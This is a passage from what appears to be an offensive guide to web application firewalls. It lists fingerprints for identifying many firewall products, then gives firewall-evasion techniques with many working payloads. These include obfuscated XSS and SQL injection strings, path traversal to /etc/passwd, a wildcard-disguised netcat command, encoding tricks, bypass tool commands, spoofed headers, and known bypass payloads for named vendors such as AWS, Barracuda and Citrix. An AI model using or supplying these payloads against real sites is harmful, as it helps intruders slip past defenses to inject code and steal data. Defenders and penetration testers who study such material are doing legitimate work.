    • Server header contains AkamaiGHost keyword.
LiteSpeed
  • Detectability: Easy
  • Detection Methodology:
    • Server header has value set to LiteSpeed.
    • Response page contains:
      • Proudly powered by LiteSpeed Web Server text.
      • Reference to http://www.litespeedtech.com/error-page
      • Access to resource on this server is denied.
Malcare
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page may contains:
      • Blocked because of Malicious Activities text snippet.
      • Firewall powered by MalCare text snippet.
MissionControl Application Shield
  • Detectability: Easy
  • Detection Methodology:
    • Server header field contains Mission Control Application Shield value.
ModSecurity
  • Detectability: Moderate/Difficult
  • Detection Methodology:
    • Blocked response page contains:
      • This error was generated by Mod_Security text snippet.
      • One or more things in your request were suspicious text snippet.
      • rules of the mod_security module text snippet.
      • mod_security rules triggered text snippet.
      • Reference to /modsecurity-errorpage/ directory.
    • Server header may contain Mod_Security or NYOB keywords.
    • Sometimes, the response code to an attack is 403 while the response phrase is ModSecurity Action.
ModSecurity CRS
  • Detectability: Difficult
  • Detection Methodology:
    • Blockpage occurs on adding a separate request header X-Scanner when set to a particular paranoa level.
NAXSI
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains This Request Has Been Blocked By NAXSI.
    • Response headers contain unusual field X-Data-Origin with value naxsi/waf keyword.
    • Server header contains naxsi/waf keyword value.
    • Blocked response page may contain NAXSI blocked information error code.
Nemesida
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains Suspicious activity detected. Access to the site is blocked..
    • Contains reference to email nwaf@{site.tld}
Netcontinuum
  • Detectability: Moderate
  • Detection Methodology:
    • Session cookies contain NCI__SessionId= cookie field name.
NetScaler AppFirewall
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain
      • Connection: header field name jumbled to nnCoection:
      • ns_af= cookie field name.
      • citrix_ns_id field name.
      • NSC_ keyword.
      • NS-CACHE field value.
NevisProxy
  • Detectability: Moderate
  • Detection Methodology:
    • Response header cookies contain Navajo keyword.
NewDefend
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • Reference to http://www.newdefend.com/feedback/misinformation/ URL.
      • Reference to /nd_block/ directory.
    • Server header contains NewDefend keyword.
Nexusguard
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page has reference to speresources.nexusguard.com/wafpage/index.html URL.
NinjaFirewall
  • Detectability: Moderate
  • Detection Methodology:
    • Response page title contains NinjaFirewall: 403 Forbidden.
    • Response page contains:
      • For security reasons, it was blocked and logged text snippet.
      • NinjaFirewall keyword in title.
    • Returns a 403 Forbidden response upon malicious requests.
NSFocus
  • Detectability: Easy
  • Detection Methodology:
    • Server header contain NSFocus keyword.
NullDDoS
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains the NullDDoS System keyword.
onMessage Shield
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain header X-Engine field with value onMessage Shield.
    • Blocked response page contains:
      • Blackbaud K-12 conducts routine maintenance keyword.
      • This site is protected by an enhanced security system.
      • Reference to https://status.blackbaud.com URL.
      • Reference to https://maintenance.blackbaud.com URL.
OpenResty Lua WAF
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains openresty/{version} keyword.
    • Blocked response page contains openresty/{version} text.
    • Blocked response code returned is 406 Not Acceptable.
Palo Alto
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page contains Virus/Spyware Download Blocked.
    • Response page might contain Palo Alto Next Generation Security Platform text snippet.
PentaWAF
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains PentaWAF/{version} keyword.
    • Blocked response page contains text PentaWAF/{version}.
PerimeterX
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to
      https://www.perimeterx.com/whywasiblocked URL.
pkSecurityModule IDS
  • Detectability: Moderate
  • Detection Methodology:
    • Response content may contain
      • pkSecurityModule: Security.Alert.
      • A safety critical request was discovered and blocked text snippet.
Positive Technologies Application Firewall
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains Forbidden in h1 followed by:
    • Request ID: in format yyyy-mm-dd-hh-mm-ss-{ref. code}
PowerCDN
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain
      • Via header with content powercdn.com.
      • X-Cache header with content powercdn.com.
      • X-CDN header with content PowerCDN.
Profense
  • Detectability: Easy
  • Detection Methodology:
    • Set-Cookie headers contain PLBSID= cookie field name.
    • Server header contain Profense keyword.
Proventia (IBM)
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page might contain to request does not match Proventia rules text snippet.
Puhui
  • Detectability: Easy
  • Detection Methodology:
    • Server header contain PuhuiWAF keyword.
Qiniu CDN
  • Detectability: Easy
  • Detection Methodology:
    • Response content may contain
      • Response headers contain unusual header X-Qiniu-CDN with value set to either 0 or 1.
Radware Appwall
  • Detectability: Moderate
  • Detection Methodology:
    • Response page contains the following text snippet:
      Unauthorized Activity Has Been Detected. and Case Number
    • Blocked response page has reference to radwarealerting@{site.tld} email.
    • Blocked response page has title set to Unauthorized Request Blocked.
    • Response headers may contain X-SL-CompState header field name.
Reblaze
  • Detectability: Moderate
  • Detection Methodology:
    • Cookies in response headers contain rbzid= header field name.
    • Server field value might contain Reblaze Secure Web Gateway text snippet.
    • Response page contains:
      • Access Denied (403) in bold.
      • Current session has been terminated text.
      • For further information, do not hesitate to contact us.
Request Validation Mode
  • Detectability: Easy
  • Detection Methodology:
    • A firewall found specifically on ASP.NET websites and none others.
    • Response page contains either of the following text snippet:
      • ASP.NET has detected data in the request that is potentially dangerous.
      • Request Validation has detected a potentially dangerous client input value.
      • HttpRequestValidationException.
    • Blocked response code returned is always 500 Internal Error.
RSFirewall
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • COM_RSFIREWALL_403_FORBIDDEN keyword.
      • COM_RSFIREWALL_EVENT keyword.
Sabre
  • Detectability: Easy
  • Detection Methodology:
    • Returns status code 500 Internal Error upon malicious requests.
    • Response content has:
      • Contact email dxsupport@sabre.com.
      • Your request has been blocked bold warning.
      • clicking the above email link will automatically add some important details to the email for us to investigate the problem text snippet.
Safe3
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain:
      • X-Powered-By header has field value Safe3WAF.
      • Server header contains field value set to Safe3 Web Firewall.
    • Response page contains Safe3waf keyword.
SafeDog
  • Detectability: Easy/Moderate
  • Detection Methodology:
    • Server header in response may contain:
      • WAF/2.0 keyword.
      • safedog field value.
SecKing
  • Detectability: Easy/Moderate
  • Detection Methodology:
    • Server header in response may contain:
      • SECKINGWAF keyword.
      • SECKING/{version} field value.
SecuPress
  • Detectability: Easy
  • Detection Methodology:
    • Response content may contain:
      • SecuPress as text.
      • Block ID: Bad URL Contents as text.
    • Response code returned is 503 Service Unavailable.
Secure Entry
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains value set to Secure Entry Server.
SecureIIS
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains either of the following text snippet:
      • Image displaying beyondtrust logo.
      • Download SecureIIS Personal Edition
      • Reference to http://www.eeye.com/SecureIIS/ URL.
      • SecureIIS Error text snippet.
SecureSphere
  • Detectability: Difficult
  • Detection Methodology:
    • Response page contains the following text snippet:
      • Error in h2 text.
      • Title contains only text as Error.
      • Contact support for additional information. text.
SEnginx
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains SENGINX-ROBOT-MITIGATION keyword.
ServerDefender VP
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response contains X-Pint header field with p80 keyword.
Shadow Daemon
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains request forbidden by administrative rules. keyword.
ShieldSecurity
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains:
      • You were blocked by the Shield. text.
      • Something in the URL, Form or Cookie data wasn't appropriate text snippet.
      • Warning: You have {number} remaining transgression(s) against this site.
      • Seriously stop repeating what you are doing or you will be locked out.
SiteGround
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains
      The page you are trying to access is restricted due to a security rule text snippet.
SiteGuard (JP Secure)
  • Detectability: Difficult
  • Detection Methodology:
    • Response page contains:
      • Powered by SiteGuard text snippet.
      • The server refuse to browse the page. text snippet.
      • The URL may not be correct. Please confirm the value.
SiteLock TrueShield
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page source contains the following:
      • Reference to www.sitelock.com URL.
      • Sitelock is leader in Business Website Security Services. text.
      • sitelock-site-verification keyword.
      • sitelock_shield_logo image.
SonicWall
  • Detectability: Easy
  • Detection Methodology:
    • Server header contain SonicWALL keyword value.
    • Blocked response page contains either of the following text snippet:
      • Image displaying Dell logo.
      • This request is blocked by the SonicWALL.
      • Web Site Blocked text snippet.
      • nsa_banner as keyword. :p
Sophos UTM
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains Powered by UTM Web Protection keyword.
SquareSpace
  • Detectability: Difficult
  • Detection Methodology:
    • Response code returned is 404 Not Found upon malicious requests.
    • Blocked response page contains either of the following text snippet:
      • BRICK-50 keyword.
      • 404 Not Found text snippet.
SquidProxy IDS
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains field value squid/{version}.
    • Blocked response page contains
      Access control configuration prevents your request from being allowed at this time..
StackPath
  • Detectability: Easy
  • Detection Methodology:
    • Contains image displaying StackPath logo.
    • Blocked response page contains
      You performed an action that triggered the service and blocked your request.
Stingray
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response code returns 403 Forbidden or 500 Internal Error.
    • Response headers contain the X-Mapping header field name.
Sucuri CloudProxy
  • Detectability: Easy
  • Detection Methodology:
    • Response headers may contain Sucuri or Cloudproxy keywords.
    • Blocked response page contains the following text snippet:
      • Access Denied - Sucuri Website Firewall text.
      • Reference to https://sucuri.net/privacy-policy URL.
      • Sometimes the email cloudproxy@sucuri.net.
      • Contains copyright notice ;copy {year} Sucuri Inc.
    • Response headers contains X-Sucuri-ID header along with normal requests.
Synology Cloud
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page has Copyright (c) 2019 Synology Inc. All rights reserved.as text.
Tencent Cloud
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response code returns 405 Method Not Allowed error.
    • Blocked response page contains reference to waf.tencent-cloud.com URL.
Teros
  • Detectability: Difficult
  • Detection Methodology:
    • Response headers contain cookie field st8id.
TrafficShield
  • Detectability: Moderate
  • Detection Methodology:
    • Server might contain F5-TrafficShield keyword.
    • ASINFO= value might be detected in response cookies.
TransIP
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain unique header X-TransIP-Backend.
    • Response headers contain another header X-TransIP-Balancer.
UCloud UEWaf
  • Detectability: Easy
  • Detection Methodology:
    • Response content might contain:
      • Reference to /uewaf_deny_pages/default/img/ inurl directory.
      • ucloud.cn URL.
    • Response headers returned has Server header set to uewaf/{version}.
URLMaster SecurityCheck
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers might contain:
      • UrlMaster keyword.
      • UrlRewriteModule keyword.
      • SecurityCheck keyword.
    • Blocked response code returned is 400 Bad Request text snippet.
URLScan
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page contains:
      • Rejected-by-URLScan text snippet.
      • Server Erro in Application as heading.
      • Module: IIS Web Core in table.
USP Secure Entry
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain Secure Entry Server field value.
Varnish (OWASP)
  • Detectability: Easy
  • Detection Methodology:
    • Malicious request returns 404 Not Found Error.
    • Response page contains:
      • Request rejected by xVarnish-WAF text snippet.
Varnish CacheWall
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • Error 403 Naughty, not Nice! as heading.
      • Varnish cache Server as text.
Viettel
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • Block page has title set to Access denied · Viettel WAF.
      • Reference to https://cloudrity.com.vn/ URL.
      • Response page contains keywords Viettel WAF system.
      • Contact information reference to https://cloudrity.com.vn/customer/#/contact URL.
VirusDie
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • http://cdn.virusdie.ru/splash/firewallstop.png picture.
      • copy; Virusdie.ru copyright notice.
      • Response page title contains Virusdie keyword.
      • Page metadata contains name="FW_BLOCK" keyword
WallArm
  • Detectability: Moderate
  • Detection Methodology:
    • Server headers contain nginx-wallarm value.
WatchGuard IPS
  • Detectability: Easy
  • Detection Methodology:
    • Server headers may contain WatchGuard field value.
    • Blocked response page contains:
      • Request denied by WatchGuard Firewall text.
      • WatchGuard Technologies Inc. as footer.
WebARX Security
  • Detectability: Easy
  • Detection Methodology:
    • Restricted to specifically WordPress sites only.
    • Blocked response page contains:
      • This request has been blocked by WebARX Web Application Firewall text.
      • Reference to /wp-content/plugins/webarx/ directory where it is installed.
WebKnight
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain WebKnight keyword.
    • Blocked response page contains:
      • WebKnight Application Firewall Alert text warning.
      • AQTRONIX WebKnight text snippet.
    • Blocked response code returned is 999 No Hacking. :p
    • Blocked response code returned is also 404 Hack Not Found. :p
WebLand
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains Apache Protected By WebLand WAF keyword.
WebRay
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains WebRay-WAF keyword.
    • Response headers may have DrivedBy field with value RaySrv RayEng/{version}.
WebSEAL
  • Detectability: Easy
  • Detection Methodology:
    • Server header contain WebSEAL keyword.
    • Blocked response page contains:
      • This is a WebSEAL error message template file text.
      • WebSEAL server received an invalid HTTP request text snippet.
WebTotem
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains The current request was blocked by WebTotem.
West263CDN
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain X-Cache header field with WT263CDN value.
Wordfence
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain WebKnight keyword.
    • Blocked response page contains:
      • Generated by Wordfence text snippet.
      • A potentially unsafe operation has been detected in your request to this site text warning.
      • Your access to this site has been limited text warning.
      • This response was generated by Wordfence text snippet.
WTS-WAF
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page title has WTS-WAF keyword.
    • Server header contains wts as value.
XLabs Security WAF
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain X-CDN header field with XLabs Security value.
Xuanwudun WAF
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/ site URL.
Yunaq Chuangyu
  • Detectability: Moderate
  • Detection Methodology:
    • Response page has reference to:
      • 365cyd.com or 365cyd.net URL.
      • Reference to help page at http://help.365cyd.com/cyd-error-help.html?code=403.
Yundun
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains YUNDUN as value.
    • X-Cache header field contains YUNDUN as value.
    • Response page contains Blocked by YUNDUN Cloud WAF text snippet.
    • Blocked response page contains reference to yundun.com/yd_http_error/ URL.
Yunsuo
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains image class reference to yunsuologo.
    • Response headers contain the yunsuo_session field name.
YxLink
  • Detectability: Easy
  • Detection Methodology:
    • Response might have yx_ci_session cookie field.
    • Response might have yx_language cookie field.
    • Server header contains Yxlink-WAF field value.
ZenEdge
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to /__zenedge/assets/ directory.
    • Server header contain ZENEDGE keyword.
    • Blocked response headers may contain X-Zen-Fury header.
ZScaler
  • Detectability: Easy
  • Detection Methodology:
    • Server header has value set to ZScaler.
    • Blocked response page contains:
      • Access Denied: Accenture Policy text.
      • Reference to https://policies.accenture.com URL.
      • Reference to image at https://login.zscloud.net/img_logo_new1.png.
      • Your organization has selected Zscaler to protect you from internet threats.
      • The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate.

Evasion Techniques

Lets look at some methods of bypassing and evading WAFs.

Fuzzing/Bruteforcing:

Method:

Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:

Technique:

Drawbacks:

Regex Reversing:

Method:

Techniques:

Blacklisting Detection/Bypass

Case: SQL Injection

• Step 1:

Keywords Filtered: and, or, union
Probable Regex: preg_match('/(and|or|union)/i', $id)

• Step 2:

Keywords Filtered: and, or, union, where

• Step 3:

Keywords Filtered: and, or, union, where, limit

• Step 4:

Keywords Filtered: and, or, union, where, limit, group by

• Step 5:

Keywords Filtered: and, or, union, where, limit, group by, select

• Step 6:

Keywords Filtered: and, or, union, where, limit, group by, select, '

• Step 7:

Keywords Filtered: and, or, union, where, limit, group by, select, ', hex

• Step 8:

Keywords Filtered: and, or, union, where, limit, group by, select, ', hex, substr

• Step 9:

Keywords Filtered: and, or, union, where, limit, group by, select, ', hex, substr, white space

Obfuscation:

Method:

Techniques:

1. Case Toggling

Standard: <script>alert()</script>
Bypassed: <ScRipT>alert()</sCRipT>

Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL Encoding

Blocked: <svG/x=">"/oNloaD=confirm()//
Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

Blocked: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode Normalization

Standard: <marquee onstart=prompt()>
Obfuscated: <marquee onstart=\u0070r\u06f\u006dpt()>

Blocked: /?redir=http://google.com
Bypassed: /?redir=http://google。com (Unicode alternative)

Blocked: <marquee loop=1 onfinish=alert()>x
Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode alternative)

TIP: Have a look at this and this reports on HackerOne. :)

Standard: ../../etc/passwd
Obfuscated: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd

4. HTML Representation

Standard: "><img src=x onerror=confirm()>
Encoded: &quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; (General form)
Encoded: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (Numeric reference)

5. Mixed Encoding

Obfuscated:

<A HREF="h
tt  p://6   6.000146.0x7.147/">XSS</A>

6. Using Comments

Blocked: <script>alert()</script>
Bypassed: <!--><script>alert/**/()/**/</script>

Blocked: /?id=1+union+select+1,2,3--
Bypassed: /?id=1+un/**/ion+sel/**/ect+1,2,3--

7. Double Encoding

Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

Standard: <script>alert()</script>
Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E

8. Wildcard Obfuscation

Standard: /bin/cat /etc/passwd
Obfuscated: /???/??t /???/??ss??
Used chars: / ? t s

Standard: /bin/nc 127.0.0.1 1337
Obfuscated: /???/n? 2130706433 1337
Used chars: / ? n [0-9]

9. Dynamic Payload Generation

Standard: <script>alert()</script>
Obfuscated: <script>eval('al'+'er'+'t()')</script>

Standard: /bin/cat /etc/passwd
Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd

Bash allows path concatenation for execution.

Standard: <iframe/onload='this["src"]="javascript:alert()"';>
Obfuscated: <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>

9. Junk Characters

Standard: <script>alert()</script>
Obfuscated: <script>+-+-1-+-+alert(1)</script>

Standard: <BODY onload=alert()>
Obfuscated: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>

NOTE: The above payload can break the regex parser to cause an exception.

Standard: <a href=javascript;alert()>ClickMe
Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

10. Line Breaks

Standard: <iframe src=javascript:confirm(0)">
Obfuscated: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">

11. Uninitialized Variables

BONUS: Variable names can have any number of random characters. I have represented them here as $aaaaaa, $bbbbbb, and so on. You can replace them with any number of random chars like $ushdjah and so on. ;)

An exotic payload crafted:

$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

12. Tabs and Line Feeds

Standard: <IMG SRC="javascript:alert();">
Bypassed: <IMG SRC=" javascript:alert();">
Variant: <IMG SRC=" jav ascri pt:alert ();">

Standard: http://test.com/test?id=1 union select 1,2,3
Standard: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

Standard: <iframe src=javascript:alert(1)></iframe>
Obfuscated:

<iframe    src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

13. Token Breakers

TIP: More payloads can be crafted via this cheat sheet.

14. Obfuscation in Other Formats

Case: IIS

Original Request:

POST /sample.aspx?id1=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

id2='union all select * from users--

Obfuscated Request + URL Encoding:

POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

The following table shows the support of different character encodings on the tested systems (when messages could be obfuscated using them):

TIP: You can use this small python script to convert your payloads and parameters to your desired encodings.

Target Encodings Notes
Nginx, uWSGI-Django-Python3 IBM037, IBM500, cp875, IBM1026, IBM273
  • Query string and body need to be encoded.
  • Url-decoded parameters in query string and body.
  • Equal sign and ampersand needed to be encoded as well (no url-encoding).
Nginx, uWSGI-Django-Python2 IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424
  • Query string and body need to be encoded.
  • Url-decoded parameters in query string and body afterwards.
  • Equal sign and ampersand should not be encoded in any way.
Apache-TOMCAT8-JVM1.8-JSP IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
  • Query string in its original format (could be url-encoded as usual).
  • Body could be sent with/without url-encoding.
  • Equal sign and ampersand should not be encoded in any way.
Apache-TOMCAT7-JVM1.6-JSP IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
  • Query string in its original format (could be url-encoded as usual).
  • Body could be sent with/without url-encoding.
  • Equal sign and ampersand should not be encoded in any way.
IIS6, 7.5, 8, 10 -ASPX (v4.x) IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025
  • Query string in its original format (could be url-encoded as usual).
  • Body could be sent with/without url-encoding.
  • Equal sign and ampersand should not be encoded in any way.

HTTP Parameter Pollution

Method:

Technique:

Below is a comparison of different servers and their relative interpretations:

Environment Parameter Interpretation Example
ASP/IIS Concatenation by comma par1=val1,val2
JSP, Servlet/Apache Tomcat First parameter is resulting par1=val1
ASP.NET/IIS Concatenation by comma par1=val1,val2
PHP/Zeus Last parameter is resulting par1=val2
PHP/Apache Last parameter is resulting par1=val2
JSP, Servlet/Jetty First parameter is resulting par1=val1
IBM Lotus Domino First parameter is resulting par1=val1
IBM HTTP Server Last parameter is resulting par1=val2
mod_perl, libapeq2/Apache First parameter is resulting par1=val1
Oracle Application Server 10G First parameter is resulting par1=val1
Perl CGI/Apache First parameter is resulting par1=val1
Python/Zope First parameter is resulting par1=val1
IceWarp An array is returned ['val1','val2']
AXIS 2400 Last parameter is resulting par1=val2
DBMan Concatenation by two tildes par1=val1~~val2
mod-wsgi (Python)/Apache An array is returned ARRAY(0x8b9058c)

HTTP Parameter Fragmentation

Sample Payload: 1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
Sample Query URL: http://test.com/url?a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS

TIP: A real life example how bypasses can be crafted using this method can be found here.

Browser Bugs:

Charset Bugs:

Example request:

GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept-Charset:utf-32; q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

When the site loads, it will be encoded to the UTF-32 encoding that we set, and then as the output encoding of the page is UTF-8, it will be rendered as: "<script>alert (1) </ script> which will trigger XSS.

Final URL encoded payload:

%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80 

Null Bytes:

Payload examples:

<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

Standard: <a href="javascript:alert()">
Obfuscated: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
Variant: <a 0x00 href="javascript:alert(1)">clickme</a>

Parsing Bugs:

Examples:

Unicode Separators:

Here is a compiled list of separators by @Masato Kinugawa:

An exotic payload example:

<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d

Using Atypical Equivalent Syntactic Structures

Some common keywords overlooked by WAF developers:

Example Payloads:

<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
1%0b||%0bLPAD(USER,7,1)

Many alternatives to the original JavaScript can be used, namely:

However the problem in using the above syntactical structures is the long payloads which might possibly be detected by the WAF or may be blocked by the CSP. However, you never know, they might bypass the CSP (if present) too. ;)

Abusing SSL/TLS Ciphers:

Technique:

Tool: abuse-ssl-bypass-waf

python abuse-ssl-bypass-waf.py -thread 4 -target <target>

CLI tools like cURL can come very handy for PoCs:

curl --ciphers <cipher> -G <test site> -d <payload with parameter>

Abuse WAF limit on HTTP Responses

Method

Technique

A similar technique was used to bypass Google Cloud Platform WAF.

Abusing DNS History:

TIP: Some online services like IP History and DNS Trails come to the rescue during the recon process.

Tool: bypass-firewalls-by-DNS-history

bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall

Using Whitelist Strings:

Method:

Technique:

Now when making a request to the server, you can append it as a parameter:

http://host.com/?randomparameter=<malicious-payload>&<shared-secret>=True

A real life example how this works can be found at this blog.

Request Header Spoofing:

Method:

Technique:

Some common headers used:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Google Dorks Approach:

Method:

Techniques:

Before anything else, you should hone up skills from Google Dorks Cheat Sheet.

Known Bypasses:

Airlock Ergon

%C0%80'+union+select+col1,col2,col3+from+table+--+

AWS

"; select * from TARGET_TABLE --
<script>eval(atob(decodeURIComponent("payload")))//

Barracuda

<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere

Cerber (WordPress)

POST host.com HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)

author=1
http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar
http://host/index.php/wp-json/wp/v2/users/

Citrix NetScaler

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
        <string>’ union select current_user, 2#</string>
    </soapenv:Body>
</soapenv:Envelope>
